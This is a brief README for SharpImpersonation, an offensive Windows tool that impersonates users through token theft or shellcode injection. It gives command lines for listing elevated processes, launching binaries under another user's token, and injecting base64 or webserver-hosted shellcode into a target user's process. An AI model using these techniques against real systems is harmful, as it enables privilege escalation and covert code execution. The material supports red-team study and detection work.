SharpImpersonation is a User Impersonation Tool – Via Token Or Shellcode Injection. This was a learning by doing project from my side. Well known techniques are used to built just another impersonation tool with some improvements in comparison to other public tools. The code base was taken from:
- https://github.com/0xbadjuju/Tokenvator
A blog post for the intruduction can be found here:
- https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/
List user processes
List only elevated processes
PS > PS C:\temp> SharpImpersonation.exe list elevated
Impersonate the first process of the target user to start a new binary
PS > PS C:\temp> SharpImpersonation.exe user: binary:
Inject base64 encoded shellcode into the first process of the target user
PS > PS C:\temp> SharpImpersonation.exe user: shellcode:
Inject shellcode loaded from a webserver into the first process of the target user
PS > PS C:\temp> SharpImpersonation.exe user: shellcode:
Impersonate the target user via ImpersonateLoggedOnuser for the current session
PS > PS C:\temp> SharpImpersonation.exe user: technique:ImpersonateLoggedOnuser